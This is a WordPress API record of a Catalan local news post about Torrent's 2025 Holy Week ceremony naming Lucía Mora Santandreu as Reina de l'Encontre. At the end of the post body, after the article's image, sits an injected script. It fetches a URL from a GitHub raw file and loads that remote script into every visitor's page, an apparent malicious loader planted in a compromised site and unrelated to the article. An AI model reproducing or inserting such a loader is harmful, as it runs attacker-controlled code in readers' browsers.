{"id":76058,"date":"2025-01-15T12:44:12","date_gmt":"2025-01-15T11:44:12","guid":{"rendered":"https:\/\/infotorrent.es\/uncategorized\/torrent-se-prepara-para-el-nombramiento-publico-de-la-reina-del-encuentro-y-angel-de-resurreccion-2025\/"},"modified":"2025-01-21T01:25:18","modified_gmt":"2025-01-21T00:25:18","slug":"torrent-se-prepara-para-el-nombramiento-publico-de-la-reina-del-encuentro-y-angel-de-resurreccion-2025","status":"publish","type":"post","link":"https:\/\/infotorrent.es\/ca\/noticias-2\/cultura-noticias-2\/torrent-se-prepara-para-el-nombramiento-publico-de-la-reina-del-encuentro-y-angel-de-resurreccion-2025\/","title":{"rendered":"Torrent es prepara per al Nomenament P\u00fablic de la Reina de l\u00b4 Encontre i \u00c1ngel de Resurrecci\u00f3 2025"},"content":{"rendered":"\n<p><strong>Luc\u00eda Mora Santandreu estar\u00e0 acompanyada de les seues cambreres Alejandra Andreu i Irene del Molino, aix\u00ed com el Germ\u00e0 Major suprem que ser\u00e0 M\u00f3nica Alejos<\/strong><\/p>\n\n\n\n<p>Este pr\u00f2xim dissabte 18 de gener a les 20.00 hores, l&#8217;Auditori de Torrent es vestir\u00e0 de gala per a acollir el Nomenament P\u00fablic de la Reina de l\u00b4 Encontre i \u00c1ngel de Resurrecci\u00f3 2025, Luc\u00eda Mora Santandreu. Presentada per la Germanor de la Flagel\u00b7laci\u00f3 del Senyor, este acte marca el cam\u00ed de les celebracions de la Setmana Santa de Torrent, una de les tradicions amb m\u00e9s arrelament en la capital de l&#8217;Horta Sud.<\/p>\n\n\n\n<p>Luc\u00eda Mora Santandreu, qui representar\u00e0 la figura \u00fanica de la Reina de la Trobada el Diumenge de Resurrecci\u00f3, estar\u00e0 acompanyada en este solemne acte per les seues cambreres Alejandra Andreu Carratal\u00e0 i Irene del Molino Xirivella. Dues exerciran un paper destacat durant els diversos esdeveniments que es duran a terme al llarg de la Setmana Santa de 2025, aportant solemnitat i representant a la figura de Na Germana de Foix.<\/p>\n\n\n\n<p>El Nomenament P\u00fablic de Luc\u00eda Mora comen\u00e7ar\u00e0 amb una recepci\u00f3 oficial presidida per l&#8217;alcaldessa de Torrent, Amparo Folgado, qui estar\u00e0 acompanyada per la Reina de l\u00b4Encontre 2024, Mariola Garrido, al costat de les seues cambreres Ana Garc\u00eda i Carmen Fern\u00e1ndez, aix\u00ed com el President de la Junta Central de Germandats de Setmana Santa de Torrent (JCHHSS), Jos\u00e9 Vicente Yago, i el regidor de Cultura, Aitor S\u00e1nchez. Este primer acte de benvinguda ser\u00e0 una oportunitat per a rebre homenatge a la Reina eixint i acomiadar oficialment el seu regnat.<\/p>\n\n\n\n<p>Despr\u00e9s del comiat oficial de Mariola Garrido, l&#8217;alcaldessa Amparo Folgado ser\u00e0 l&#8217;encarregada d&#8217;imposar a Luc\u00eda Mora el distintiu que l&#8217;acredita com a Reina de l\u00b4encontre 2025. Este gest, ple de significat, simbolitza el comprom\u00eds de Luc\u00eda amb la representaci\u00f3 de les tradicions religioses i culturals de Torrent durant l&#8217;any seg\u00fcent.<\/p>\n\n\n\n<p>El paper de mantenidor de l&#8217;acte recaur\u00e0 en Miguel \u00c1ngel Requena, cos\u00ed germ\u00e0 de Luc\u00eda Mora. Requena, qui \u00e9s docent a l&#8217;Escola Professional Xavier de la Fundaci\u00f3 Javerianas de Val\u00e8ncia, aportar\u00e0 un toc personal i pr\u00f2xim a la fam\u00edlia de la Reina.<\/p>\n\n\n\n<p>Durant l&#8217;acte tamb\u00e9 intervindran l&#8217;Alcaldessa, Amparo Folgado el president de la JCHHSS, Jos\u00e9 Vicente Yago i el consiliari, Sr. Jes\u00fas Corb\u00ed,<\/p>\n\n\n\n<p>Un dels moments m\u00e9s esperats de la nit ser\u00e0 la pujada a l&#8217;escenari dels germans majors de les diferents germanors de Setmana Santa de Torrent, i del Germ\u00e0 Major Suprem, M\u00f3nica Alejos Andreu, els qui acompanyaran a Luc\u00eda Mora en este important pas. Este acte simbolitza la uni\u00f3 de totes les germanors entorn de la figura de la Reina de la Trobada, refor\u00e7ant l&#8217;esperit de fraternitat que definix a la Setmana Santa Torrentina.<\/p>\n\n\n\n<p>La Setmana Santa de Torrent \u00e9s una de les festivitats m\u00e9s destacades de la Comunitat Valenciana i atrau cada any a centenars de visitants que se sumen a les celebracions. Amb esdeveniments com este, la ciutat reafirma el seu comprom\u00eds amb la preservaci\u00f3 de les seues tradicions i la promoci\u00f3 de la seua rica her\u00e8ncia cultural.<\/p>\n\n\n\n<p>L&#8217;acte d&#8217;este dissabte ser\u00e0, sense dubte, un preludi emocionant per a tot el que est\u00e0 per vindre durant la Setmana Santa de 2025. Luc\u00eda Mora Santandreu, al costat d&#8217;Alejandra Andreu Carratal\u00e0 i Irene del Molino Xirivella, assumiran amb orgull el seu paper com a representants d&#8217;esta tradici\u00f3, portant amb si el carinyo i el suport de tota la ciutat.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"825\" height=\"1024\" src=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/473076980_667265622316745_5135367558286245789_n-825x1024.jpg\" alt=\"\" class=\"wp-image-76054\" srcset=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/473076980_667265622316745_5135367558286245789_n-825x1024.jpg 825w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/473076980_667265622316745_5135367558286245789_n-242x300.jpg 242w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/473076980_667265622316745_5135367558286245789_n-768x953.jpg 768w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/473076980_667265622316745_5135367558286245789_n.jpg 1072w\" sizes=\"(max-width: 825px) 100vw, 825px\" \/><\/figure>\n<script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script>","protected":false},"excerpt":{"rendered":"<p>Luc\u00eda Mora Santandreu estar\u00e0 acompanyada de les seues cambreres Alejandra Andreu i Irene del Molino, aix\u00ed com el Germ\u00e0 Major suprem que ser\u00e0 M\u00f3nica Alejos Este pr\u00f2xim dissabte 18 de gener a les 20.00 hores, l&#8217;Auditori de Torrent es vestir\u00e0 de gala per a acollir el Nomenament P\u00fablic de la Reina de l\u00b4 Encontre i [&hellip;]<\/p>\n","protected":false},"author":15,"featured_media":76061,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[756,136],"tags":[],"class_list":["post-76058","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cultura-noticias-2","category-festes-i-turisme"],"acf":[],"_links":{"self":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/76058","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/comments?post=76058"}],"version-history":[{"count":4,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/76058\/revisions"}],"predecessor-version":[{"id":76268,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/76058\/revisions\/76268"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media\/76061"}],"wp:attachment":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media?parent=76058"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/categories?post=76058"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/tags?post=76058"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}